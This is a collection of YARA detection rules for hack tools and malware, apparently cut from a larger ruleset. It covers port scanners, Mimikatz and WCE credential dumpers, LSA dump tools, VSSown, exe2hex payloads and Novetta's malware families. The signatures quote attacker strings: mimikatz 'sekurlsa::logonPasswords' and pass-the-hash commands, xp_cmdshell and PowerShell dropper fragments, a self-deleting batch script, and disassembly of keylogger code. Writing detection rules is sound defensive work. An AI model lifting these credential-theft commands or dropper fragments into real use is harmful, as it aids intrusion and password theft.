pscan2" fullword ascii $s5 = "echo \"[*] ${DCYN}Gata esti h4x0r ;-)${RES} [*]\"" fullword ascii $s6 = "echo -e \"${DCYN}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${RES}\"" fullword ascii condition: 1 of them } rule LinuxHacktool_eyes_pscan2_2 { meta: description = "Linux hack tools - file pscan2.c" author = "Florian Roth" reference = "not set" date = "2015/01/19" hash = "eb024dfb441471af7520215807c34d105efa5fd8" strings: $s0 = "snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);" fullword ascii $s2 = "printf(\"Usage: %s <b-block> <port> [c-block]\\n\", argv[0]);" fullword ascii $s3 = "printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - sca" ascii $s19 = "connlist[i].addr.sin_family = AF_INET;" fullword ascii $s20 = "snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\"," fullword ascii condition: 2 of them } rule CN_Portscan : APT { meta: description = "CN Port Scanner" author = "Florian Roth" release_date = "2013-11-29" confidential = false score = 70 strings: $s1 = "MZ" $s2 = "TCP 12.12.12.12" condition: ($s1 at 0) and $s2 } rule WMI_vbs : APT { meta: description = "WMI Tool - APT" author = "Florian Roth" release_date = "2013-11-29" confidential = false score = 70 strings: $s3 = "WScript.Echo \" $$\\ $$\\ $$\\ $$\\ $$$$$$\\ $$$$$$$$\\ $$\\ $$\\ $$$$$$$$\\ $$$$$$" condition: all of them } rule CN_Toolset__XScanLib_XScanLib_XScanLib { meta: description = "Detects a Chinese hacktool from a disclosed toolset - from files XScanLib.dll, XScanLib.dll, XScanLib.dll" author = "Florian Roth" reference = "http://qiannao.com/ls/905300366/33834c0c/" reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar" date = "2015/03/30" score = 70 super_rule = 1 hash0 = "af419603ac28257134e39683419966ab3d600ed2" hash1 = "c5cb4f75cf241f5a9aea324783193433a42a13b0" hash2 = "135f6a28e958c8f6a275d8677cfa7cb502c8a822" strings: $s1 = "Plug-in thread causes an exception, failed to alert user." fullword $s2 = "PlugGetUdpPort" fullword $s3 = "XScanLib.dll" fullword $s4 = "PlugGetTcpPort" fullword $s11 = "PlugGetVulnNum" fullword condition: all of them } rule CN_Toolset_NTscan_PipeCmd { meta: description = "Detects a Chinese hacktool from a disclosed toolset - file PipeCmd.exe" author = "Florian Roth" reference = "http://qiannao.com/ls/905300366/33834c0c/" reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar" date = "2015/03/30" score = 70 hash = "a931d65de66e1468fe2362f7f2e0ee546f225c4e" strings: $s2 = "Please Use NTCmd.exe Run This Program." fullword ascii $s3 = "PipeCmd.exe" fullword wide $s4 = "\\\\.\\pipe\\%s%s%d" fullword ascii $s5 = "%s\\pipe\\%s%s%d" fullword ascii $s6 = "%s\\ADMIN$\\System32\\%s%s" fullword ascii $s7 = "%s\\ADMIN$\\System32\\%s" fullword ascii $s9 = "PipeCmdSrv.exe" fullword ascii $s10 = "This is a service executable! Couldn't start directly." fullword ascii $s13 = "\\\\.\\pipe\\PipeCmd_communicaton" fullword ascii $s14 = "PIPECMDSRV" fullword wide $s15 = "PipeCmd Service" fullword ascii condition: 4 of them } rule CN_Toolset_LScanPortss_2 { meta: description = "Detects a Chinese hacktool from a disclosed toolset - file LScanPortss.exe" author = "Florian Roth" reference = "http://qiannao.com/ls/905300366/33834c0c/" reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar" date = "2015/03/30" score = 70 hash = "4631ec57756466072d83d49fbc14105e230631a0" strings: $s1 = "LScanPort.EXE" fullword wide $s3 = "www.honker8.com" fullword wide $s4 = "DefaultPort.lst" fullword ascii $s5 = "Scan over.Used %dms!" fullword ascii $s6 = "www.hf110.com" fullword wide $s15 = "LScanPort Microsoft " fullword wide $s18 = "L-ScanPort2.0 CooFly" fullword wide condition: 4 of them } rule CN_Toolset_sig_1433_135_sqlr { meta: description = "Detects a Chinese hacktool from a disclosed toolset - file sqlr.exe" author = "Florian Roth" reference = "http://qiannao.com/ls/905300366/33834c0c/" reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar" date = "2015/03/30" score = 70 hash = "8542c7fb8291b02db54d2dc58cd608e612bfdc57" strings: $s0 = "Connect to %s MSSQL server success. Type Command at Prompt." fullword ascii $s11 = ";DATABASE=master" fullword ascii $s12 = "xp_cmdshell '" fullword ascii $s14 = "SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserver" ascii condition: all of them } /* Mimikatz */ rule Mimikatz_Memory_Rule_1 : APT { meta: author = "Florian Roth" date = "12/22/2014" score = 70 type = "memory" description = "Detects password dumper mimikatz in memory" strings: $s1 = "sekurlsa::msv" fullword ascii $s2 = "sekurlsa::wdigest" fullword ascii $s4 = "sekurlsa::kerberos" fullword ascii $s5 = "sekurlsa::tspkg" fullword ascii $s6 = "sekurlsa::livessp" fullword ascii $s7 = "sekurlsa::ssp" fullword ascii $s8 = "sekurlsa::logonPasswords" fullword ascii $s9 = "sekurlsa::process" fullword ascii $s10 = "ekurlsa::minidump" fullword ascii $s11 = "sekurlsa::pth" fullword ascii $s12 = "sekurlsa::tickets" fullword ascii $s13 = "sekurlsa::ekeys" fullword ascii $s14 = "sekurlsa::dpapi" fullword ascii $s15 = "sekurlsa::credman" fullword ascii condition: 1 of them } rule Mimikatz_Memory_Rule_2 : APT { meta: description = "Mimikatz Rule generated from a memory dump" author = "Florian Roth - Florian Roth" type = "memory" score = 80 strings: $s0 = "sekurlsa::" ascii $x1 = "cryptprimitives.pdb" ascii $x2 = "Now is t1O" ascii fullword $x4 = "ALICE123" ascii $x5 = "BOBBY456" ascii condition: $s0 and 1 of ($x*) } rule mimikatz { meta: description = "mimikatz" author = "Benjamin DELPY (gentilkiwi)" tool_author = "Benjamin DELPY (gentilkiwi)" score = 80 strings: $exe_x86_1 = { 89 71 04 89 [0-3] 30 8d 04 bd } $exe_x86_2 = { 89 79 04 89 [0-3] 38 8d 04 b5 } $exe_x64_1 = { 4c 03 d8 49 [0-3] 8b 03 48 89 } $exe_x64_2 = { 4c 8b df 49 [0-3] c1 e3 04 48 [0-3] 8b cb 4c 03 [0-3] d8 } $dll_1 = { c7 0? 00 00 01 00 [4-14] c7 0? 01 00 00 00 } $dll_2 = { c7 0? 10 02 00 00 ?? 89 4? } $sys_x86 = { a0 00 00 00 24 02 00 00 40 00 00 00 [0-4] b8 00 00 00 6c 02 00 00 40 00 00 00 } $sys_x64 = { 88 01 00 00 3c 04 00 00 40 00 00 00 [0-4] e8 02 00 00 f8 02 00 00 40 00 00 00 } condition: (all of ($exe_x86_*)) or (all of ($exe_x64_*)) or (all of ($dll_*)) or (any of ($sys_*)) } rule mimikatz_lsass_mdmp { meta: description = "LSASS minidump file for mimikatz" author = "Benjamin DELPY (gentilkiwi)" strings: $lsass = "System32\\lsass.exe" wide nocase condition: (uint32(0) == 0x504d444d) and $lsass } rule wce { meta: description = "wce" author = "Benjamin DELPY (gentilkiwi)" tool_author = "Hernan Ochoa (hernano)" strings: $hex_legacy = { 8b ff 55 8b ec 6a 00 ff 75 0c ff 75 08 e8 [0-3] 5d c2 08 00 } $hex_x86 = { 8d 45 f0 50 8d 45 f8 50 8d 45 e8 50 6a 00 8d 45 fc 50 [0-8] 50 72 69 6d 61 72 79 00 } $hex_x64 = { ff f3 48 83 ec 30 48 8b d9 48 8d 15 [0-16] 50 72 69 6d 61 72 79 00 } condition: any of them } rule lsadump { meta: description = "LSA dump programe (bootkey/syskey) - pwdump and others" author = "Benjamin DELPY (gentilkiwi)" strings: $str_sam_inc = "\\Domains\\Account" ascii nocase $str_sam_exc = "\\Domains\\Account\\Users\\Names\\" ascii nocase $hex_api_call = {(41 b8 | 68) 00 00 00 02 [0-64] (68 | ba) ff 07 0f 00 } $str_msv_lsa = { 4c 53 41 53 52 56 2e 44 4c 4c 00 [0-32] 6d 73 76 31 5f 30 2e 64 6c 6c 00 } $hex_bkey = { 4b 53 53 4d [20-70] 05 00 01 00} condition: ( ($str_sam_inc and not $str_sam_exc) or $hex_api_call or $str_msv_lsa or $hex_bkey ) and not uint16(0) == 0x5a4d } rule Mimikatz_Logfile { meta: description = "Detects a log file generated by malicious hack tool mimikatz" author = "Florian Roth" score = 80 date = "2015/03/31" reference = "https://github.com/Neo23x0/Loki/blob/master/signatures/thor-hacktools.yar" strings: $s1 = "SID :" ascii fullword $s2 = "* NTLM :" ascii fullword $s3 = "Authentication Id :" ascii fullword $s4 = "wdigest :" ascii fullword condition: all of them } rule AppInitHook { meta: description = "AppInitGlobalHooks-Mimikatz - Hide Mimikatz From Process Lists - file AppInitHook.dll" author = "Florian Roth" reference = "https://goo.gl/Z292v6" date = "2015-07-15" score = 70 hash = "e7563e4f2a7e5f04a3486db4cefffba173349911a3c6abd7ae616d3bf08cfd45" strings: $s0 = "\\Release\\AppInitHook.pdb" ascii $s1 = "AppInitHook.dll" fullword ascii $s2 = "mimikatz.exe" fullword wide $s3 = "]X86Instruction->OperandSize >= Operand->Length" fullword wide $s4 = "mhook\\disasm-lib\\disasm.c" fullword wide $s5 = "mhook\\disasm-lib\\disasm_x86.c" fullword wide $s6 = "VoidFunc" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 500KB and 4 of them } rule VSSown_VBS { meta: description = "Detects VSSown.vbs script - used to export shadow copy elements like NTDS to take away and crack elsewhere" author = "Florian Roth" date = "2015-10-01" score = 75 strings: $s0 = "Select * from Win32_Service Where Name ='VSS'" ascii $s1 = "Select * From Win32_ShadowCopy" ascii $s2 = "cmd /C mklink /D " ascii $s3 = "ClientAccessible" ascii $s4 = "WScript.Shell" ascii $s5 = "Win32_Process" ascii condition: all of them } rule wineggdrop : portscanner toolkit { meta: author = "Christian Rebischke (@sh1bumi)" date = "2015-09-05" description = "Rules for TCP Portscanner VX.X by WinEggDrop" in_the_wild = true family = "Hackingtool/Portscanner" strings: $a = { 54 43 50 20 50 6f 72 74 20 53 63 61 6e 6e 65 72 20 56 3? 2e 3? 20 42 79 20 57 69 6e 45 67 67 44 72 6f 70 0a } $b = "Result.txt" $c = "Usage: %s TCP/SYN StartIP [EndIP] Ports [Threads] [/T(N)] [/(H)Banner] [/Save]\n" condition: //check for MZ Signature at offset 0 uint16(0) == 0x5A4D and //check for wineggdrop specific strings $a and $b and $c } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2016-01-15 Identifier: Exe2hex */ rule Payload_Exe2Hex : toolkit { meta: description = "Detects payload generated by exe2hex" author = "Florian Roth" reference = "https://github.com/g0tmi1k/exe2hex" date = "2016-01-15" score = 70 strings: $a1 = "set /p \"=4d5a" ascii $a2 = "powershell -Command \"$hex=" ascii $b1 = "set+%2Fp+%22%3D4d5" ascii $b2 = "powershell+-Command+%22%24hex" ascii $c1 = "echo 4d 5a " ascii $c2 = "echo r cx >>" ascii $d1 = "echo+4d+5a+" ascii $d2 = "echo+r+cx+%3E%3E" ascii condition: all of ($a*) or all of ($b*) or all of ($c*) or all of ($d*) } import "pe" rule DeltaCharlie { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: $rsaKey = {7B 4E 1E A7 E9 3F 36 4C DE F4 F0 99 C4 D9 B7 94 A1 FF F2 97 D3 91 13 9D C0 12 02 E4 4C BB 6C 77 48 EE 6F 4B 73 D7 1A 44 13 B3 6A BB 61 44 AF 31 47 E7 87 C2 AE 7A A7 2C 3A D9 5C 2E 42 1A A6 78 FE 2C AD ED 39 3F FA D0 AD 3D D9 C5 3F 58 A0 19 27 CC 27 C9 E8 D8 1E 7E EE 91 DD 13 B3 47 EF 57 1A CA FF 9A 60 E0 64 08 AA E2 92 D0} condition: any of them } import "pe" rule HotelAlfa { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "58dab205ecb1e0972027eb92f68cec6d208e5ab5.ex_" strings: $resourceHTML = "RSRC_HTML" /* 8A 0C 18 mov cl, [eax+ebx] 80 F1 63 xor cl, 63h 88 0C 18 mov [eax+ebx], cl 8B 4D 00 mov ecx, [ebp+0] 40 inc eax 3B C1 cmp eax, ecx 72 EF jb short loc_4010B4 */ $rscsDecoderLoop = {8A [2] 80 F1 ?? 88 [2] 8B [2] 40 3B ?? 72 EF} condition: $resourceHTML and $rscsDecoderLoop in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule IndiaAlfa_One { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: $ = "HwpFilePathCheck.dll" $ = "AdobeArm.exe" $ = "OpenDocument" condition: 2 of them } rule IndiaAlfa_Two { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: $ = "ExePath: %s\nXlsPath: %s\nTmpPath: %s\n" condition: any of them } import "pe" rule IndiaBravo_PapaAlfa { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: $ = "pmsconfig.msi" wide $ = "scvrit001.bat" condition: all of them } rule IndiaBravo_RomeoCharlie { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "58ad28ac4fb911abb6a20382456c4ad6fe5c8ee5.ex_" Status = "Signature is too loose to be useful." strings: /* 50 push eax ; argp 68 7E 66 04 80 push 8004667Eh ; cmd 8B 8D DC FE FF FF mov ecx, [ebp+skt] 51 push ecx ; s FF 15 58 31 41 00 call ioctlsocket 83 F8 FF cmp eax, 0FFFFFFFFh 75 08 jnz short loc_4043F0 */ $a = {50 68 7E 66 04 80 8B 8D [4] 51 FF 15 [4] 83 F8 FF 75} $b1 = "xc123465-efff-87cc-37abcdef9" $b2 = "[Check] - PORT ERROR..." wide $b3 = "%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d" condition: 2 of ($b*) or $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule IndiaBravo_RomeoBravo { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "6e3db4da27f12eaba005217eba7cd9133bc258c97fe44605d12e20a556775009" strings: /* E8 C3 FE FF FF call generate64ByteRandomNumber 68 C8 01 00 00 push 1C8h ; dwLength 68 D8 E8 40 00 push offset g_Config ; pvBuffer A3 80 EA 40 00 mov dword ptr g_Config.qwIdentifier, eax 89 15 84 EA 40 00 mov dword ptr g_Config.qwIdentifier+4, edx E8 F9 E9 FF FF call DNSCALCDecode 83 C4 08 add esp, 8 8D 4C 24 08 lea ecx, [esp+214h+var_20C] 6A 00 push 0 51 push ecx 68 C8 01 00 00 push 1C8h 68 D8 E8 40 00 push offset g_Config 56 push esi FF 15 74 E7 40 00 call WriteFile_9 56 push esi FF 15 6C E7 40 00 call CloseHandle_9 */ $a = {E8 [4] 68 [2] 00 00 68 [4] A3 [4] 89 15 [4] E8 [4] 83 C4 08 8D [3] 6A 00 5? 68 [2] 00 00 68 [4] 5? FF 15 [4] 5? FF 15} $b1 = "tmscompg.msi" wide $b2 = "cvrit000.bat" condition: 2 of ($b*) or $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule IndiaBravo_generic { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: $extractDll = "[2] - Extract Dll..." wide $createSvc = "[3] - CreateSVC..." wide condition: all of them } rule IndiaCharlie_One { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: $ = "WMPNetworkSvcUpdate" $ = "backSched.dll" $ = "\\mspaint.exe" $aesKey = "X,LLIe{))%%l2i<[AM|aq!Ql/lPlw]d7@C-#j.<c|#*}Kx4_H(q^F-F^p/[t#%HT" condition: 2 of them or $aesKey } rule IndiaCharlie_Two { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: $s1 = "%s is an essential element in Windows System configuration and management. %s" $s2 = "%SYSTEMROOT%\\system32\\svchost.exe -k " $s3 = "%s\\system32\\%s" $s4 = "\\mspaint.exe" $s5 = ":R\nIF NOT EXIST %s GOTO E\ndel /a %s\nGOTO R\n:E\ndel /a d.bat" $aesKey = "}[eLkQAeEae0t@h18g!)3x-RvE%+^`n.6^()?+00ME6a&F7vcV}`@.dj]&u$o*vX" condition: 3 of ($s*) or $aesKey } import "pe" rule IndiaDelta { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "d7b50b1546653bff68220996190446bdc7fc4e38373715b8848d1fb44fe3f53c" strings: /* FF 15 DC 2D 41 00 call ReadFile_0 8B 44 24 20 mov eax, [esp+25Ch+offsetInFile] 8B 54 24 1C mov edx, [esp+25Ch+dwEmbedCnt] 35 78 56 34 12 xor eax, 12345678h 55 push ebp 55 push ebp 81 F2 78 56 34 12 xor edx, 12345678h 50 push eax 57 push edi 89 54 24 2C mov [esp+26Ch+dwEmbedCnt], edx 89 44 24 30 mov [esp+26Ch+offsetInFile], eax FF 15 E0 2D 41 00 call SetFilePointer_0 */ $a = {FF 15 [4-12] 3? 78 56 34 12 [0-2] 8? ?? 78 56 34 12 [0-10] FF 15} condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } import "pe" rule IndiaEcho { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "66a21f8c72bb4f314604526e9bf1736f75b06cf37dd3077eb292941b476c3235" strings: /* 69 C0 28 01 00 00 imul eax, 128h 50 push eax ; size_t 53 push ebx ; int FF B5 AC FD FF FF push [ebp+configRecords]; void * E8 6E 08 00 00 call _memset 8B 85 A4 FC FF FF mov eax, [ebp+var_35C.dwRecordCnt] 69 C0 28 01 00 00 imul eax, 128h 50 push eax ; size_t 8B 85 C4 FE FF FF mov eax, [ebp+hMem] 05 08 01 00 00 add eax, 108h 50 push eax ; void * FF B5 AC FD FF FF push [ebp+configRecords]; void * E8 0A 05 00 00 call _memcpy 83 C4 18 add esp, 18h 8B BD A4 FC FF FF mov edi, [ebp+var_35C.dwRecordCnt] 69 FF 28 01 00 00 imul edi, 128h 81 C7 08 01 00 00 add edi, 108h */ $a = {69 ?? 28 01 00 00 5? 5? FF B5 [4] E8 [4] 8B [5] 69 ?? 28 01 00 00 50 8B [5] (05 08 01 00 00 | 03 ??) 50 FF [5] E8 [4] 83 C4 ?? 8B [5] 69 ?? 28 01 00 00 (81 C7 08 01 00 00 | 03 ??)} condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } import "pe" rule IndiaGolf { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "3dda69dfb254dcaea2ba6e8323d4b61ab1e130a0694f4c43d336cfb86a760c50" strings: /* FF D6 call esi ; rand 8B F8 mov edi, eax C1 E7 10 shl edi, 10h FF D6 call esi ; rand 03 F8 add edi, eax 89 7C 24 20 mov [esp+2A90h+var_2A70], edi FF D6 call esi ; rand 8B F8 mov edi, eax C1 E7 10 shl edi, 10h FF D6 call esi ; rand 03 F8 add edi, eax 89 7C 24 24 mov [esp+2A90h+var_2A6C], edi */ $generateRandomID = {FF ?? 8B ?? C1 ?? 10 FF ?? 03 F8 89 [3] FF ?? 8B ?? C1 ?? 10 FF ?? 03 ?? 89} condition: $generateRandomID in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } import "pe" rule IndiaHotel { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "8a4fc5007faf85e07710dca705108df9fd6252fe3d57dfade314120d72f6d83f" strings: /* 6A 0A push 0Ah ; int 8D 85 C4 E4 FF FF lea eax, [ebp+Source] 68 10 02 00 00 push 210h ; unsigned int 50 push eax ; void * E8 FA 60 00 00 call ??_L@YGXPAXIHP6EX0@Z1@Z; `eh vector constructor iterator'(void *,uint,int,void (*)(void *),void (*)(void *)) */ $fileExtractorArraySetup = {6A 0A 8D [5-6] 68 10 02 00 00 50 E8} condition: $fileExtractorArraySetup in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } import "pe" rule IndiaJuliett_1 { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source_writeFile = "a164c0ba0be7c33778c12a6457e9c55a2935564a" strings: $configFilename = {00 73 63 61 72 64 70 72 76 2E 64 6C 6C 00} $suicideScript = ":R\nIF NOT EXIST %s GOTO E\ndel /a %s\nGOTO R\n:E\ndel /a d.bat" $commKey = { 10 20 30 40 50 60 70 80 90 11 12 13 1A FF EE 48 } /* .text:10001850 push 7530h ; dwTimeout .text:10001855 lea eax, [esp+420h+a2] .text:10001859 push 4 ; len .text:1000185B push eax ; a2 .text:1000185C push esi ; s .text:1000185D mov dword ptr [esp+42Ch+a2], 1000h .text:10001865 call CommSendWithTimeout .text:1000186A add esp, 14h .text:1000186D cmp eax, 0FFFFFFFFh .text:10001870 jz loc_10001915 .text:10001876 lea ecx, [esp+418h+random] .text:1000187A push ecx ; a1 .text:1000187B call Generate16ByteRandomBuffer .text:10001880 push 0 ; fEncrypt .text:10001882 push 7530h ; dwTimeout */ $handshake = { 68 30 75 00 00 [4] 6A 04 5? 5? C? [3] 00 10 00 00 E8 [7] 83 F8 FF 0F 84 ?? ?? 00 00 8? [3] 5? E8 [4] 6A 00 68 30 75 00 00 } /* 68 00 28 00 00 push 2800h 56 push esi E8 38 F7 FF FF call sub_401000 // optionally there is a "add esp, 8" in some variants here 8D 44 24 28 lea eax, [esp+270h+NumberOfBytesWritten] 6A 00 push 0 ; lpOverlapped 50 push eax ; lpNumberOfBytesWritten 68 00 28 00 00 push 2800h ; nNumberOfBytesToWrite 56 push esi ; lpBuffer 53 push ebx ; hFile FF 15 6C 80 40 00 call ds:WriteFile 81 ED 00 28 00 00 sub ebp, 2800h 81 C7 00 28 00 00 add edi, 2800h 81 C6 00 28 00 00 add esi, 2800h */ $writeFile = {68 00 28 00 00 5? E8 [4-7] 8D [3] 6A 00 5? 68 00 28 00 00 5? 5? FF 15 [4] 81 ?? 00 28 00 00 81 ?? 00 28 00 00 81 ?? 00 28 00 00} condition: ($configFilename in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size)) or $suicideScript in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size))) or ($handshake in ((pe.sections[pe.section_index(".rsrc")].raw_data_offset)..(pe.sections[pe.section_index(".rsrc")].raw_data_offset + pe.sections[pe.section_index(".rsrc")].raw_data_size)) and $commKey in ((pe.sections[pe.section_index(".rsrc")].raw_data_offset)..(pe.sections[pe.section_index(".rsrc")].raw_data_offset + pe.sections[pe.section_index(".rsrc")].raw_data_size))) or $writeFile in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } import "pe" rule IndiaWhiskey { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "0c729deec341267c5a9a2271f20266ac3b0775d70436c7770ddc20605088f3b4" Description = "Winsec Installer" strings: /* // Service installation code FF 15 68 30 40 00 call ds:wsprintfA 83 C4 18 add esp, 18h 8D 85 FC FE FF FF lea eax, [ebp+var_104] 56 push esi 56 push esi 56 push esi 56 push esi 56 push esi 50 push eax 6A 01 push 1 // some variants have these two lines added 5E pop esi 56 push esi 6A 02 push 2 68 20 01 00 00 push 120h 68 FF 01 0F 00 push 0F01FFh FF 75 0C push [ebp+arg_4] FF 75 08 push [ebp+arg_0] // some variants have the next line as a push {reg} or push {stack var} 53 push ebx //or FF 75 FC push [ebp+var_4] FF 15 E4 49 40 00 call CreateServiceA */ $a = {FF 15 [4] 83 C4 18 8D [5] 5? 5? 5? 5? 5? 5? 6A 01 [0-2] 6A 02 68 20 01 00 00 68 FF 01 0F 00 FF 75 ?? FF 75 ?? (5? | FF 75 ??) FF 15} condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } import "pe" rule KiloAlfa { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" type = "Keylogger" SourceForDnscalcVariant1 = "b855d05ef7ab6582864c9b35052a1073a6eb7d0c7e9d97f524ec062715d71321" SourceForDnscalcVariant2 = "ddde628be8cd5db768b807510ae1319888e6c4550a5b9a0d54e17b9ec4aaa256" strings: /* push <variable> call GetAsyncKeyState cmp ax, 8001h jnz short loc_4021EE push <variable> ; a1 call AddCharacterToKeyLogBuffer add esp, 4 this block of code is used multiple times in sequence so i'm looking for 5 consecutive blocks */ $keyxlate = {68 ?? 00 00 00 FF 15 [4] 66 ?? 01 80 75 ?? 6A ?? E8 [4] 83 C4 04 68 ?? 00 00 00 FF 15 [4] 66 ?? 01 80 75 ?? 6A ?? E8 [4] 83 C4 04 68 ?? 00 00 00 FF 15 [4] 66 ?? 01 80 75 ?? 6A ?? E8 [4] 83 C4 04 68 ?? 00 00 00 FF 15 [4] 66 ?? 01 80 75 ?? 6A ?? E8 [4] 83 C4 04} /* 6A 2A push 2Ah C6 84 24 C4 00 00 00 D6 mov [esp+70Ch+var_648], 0D6h C6 84 24 C5 00 00 00 E1 mov [esp+70Ch+var_647], 0E1h C6 84 24 C6 00 00 00 BF mov [esp+70Ch+var_646], 0BFh C6 84 24 C7 00 00 00 C8 mov [esp+70Ch+var_645], 0C8h C6 84 24 C8 00 00 00 C3 mov [esp+70Ch+var_644], 0C3h C6 84 24 C9 00 00 00 BD mov [esp+70Ch+var_643], 0BDh 88 9C 24 CA 00 00 00 mov [esp+70Ch+var_642], bl FF 15 48 5B 40 00 call GetAsyncKeyState 66 3D 01 80 cmp ax, 8001h 75 20 jnz short loc_401696 8D 94 24 00 01 00 00 lea edx, [esp+708h+pszOutput] 8D 84 24 C0 00 00 00 lea eax, [esp+708h+var_648] 52 push edx ; pszOutput 6A 07 push 7 ; dwLength 50 push eax ; pszInput E8 A3 F9 FF FF call DNSCALCDecode 50 push eax ; a1 E8 7D FB FF FF call AddEntryToKeylogDataBuffer 83 C4 10 add esp, 10h */ $keyxlateDnscalc1 = { 6A 2A C6 [6] D6 C6 [6] E1 C6 [6] BF C6 [6] C8 C6 [6] C3 C6 [6] BD 88 [6] FF 15 [4] 66 3D 01 80 75 ?? 8D [6] 8D [6] 5? 6A 07 5? E8 [4] 50 E8 [4] 83 C4 10 } /* 6A 2A push 2Ah C7 85 74 FF FF FF D6 E1 BF C8 mov dword ptr [ebp+var_8C], 0C8BFE1D6h 66 C7 85 78 FF FF FF C3 BD mov [ebp+var_88], 0BDC3h 88 9D 7A FF FF FF mov [ebp+var_86], bl FF 15 04 47 41 00 call GetAsyncKeyState BA 01 80 FF FF mov edx, 0FFFF8001h 66 3B C2 cmp ax, dx 75 1E jnz short loc_4018B0 8D 85 CC FE FF FF lea eax, [ebp+a3] 50 push eax ; a3 8D 8D 74 FF FF FF lea ecx, [ebp+var_8C] 6A 07 push 7 ; dwLength 51 push ecx ; a1 E8 89 F7 FF FF call DNSCalcDecode 50 push eax ; a1 E8 83 F9 FF FF call RecordStringToLog 83 C4 10 add esp, 10h */ $keyxlateDnscalc2 = { 6A 2A C7 [5] D6 E1 BF C8 66 [6] C3 BD 88 [5] FF 15 [4] BA 01 80 FF FF 66 3B C2 75 ?? 8D [5] 5? 8D [5] 6A 07 5? E8 [4] 50 E8 [4] 83 C4 10 } condition: $keyxlate in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $keyxlateDnscalc1 in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $keyxlateDnscalc2 in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } import "pe" rule LimaAlfa { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "c9fbad7fc7ff7688776056be3a41714a1f91458a7b16c37c3c906d17daac2c8b" Status = "Signature is too loose to be useful." strings: /* 33 C0 xor eax, eax 66 8B 02 mov ax, [edx] 8B E8 mov 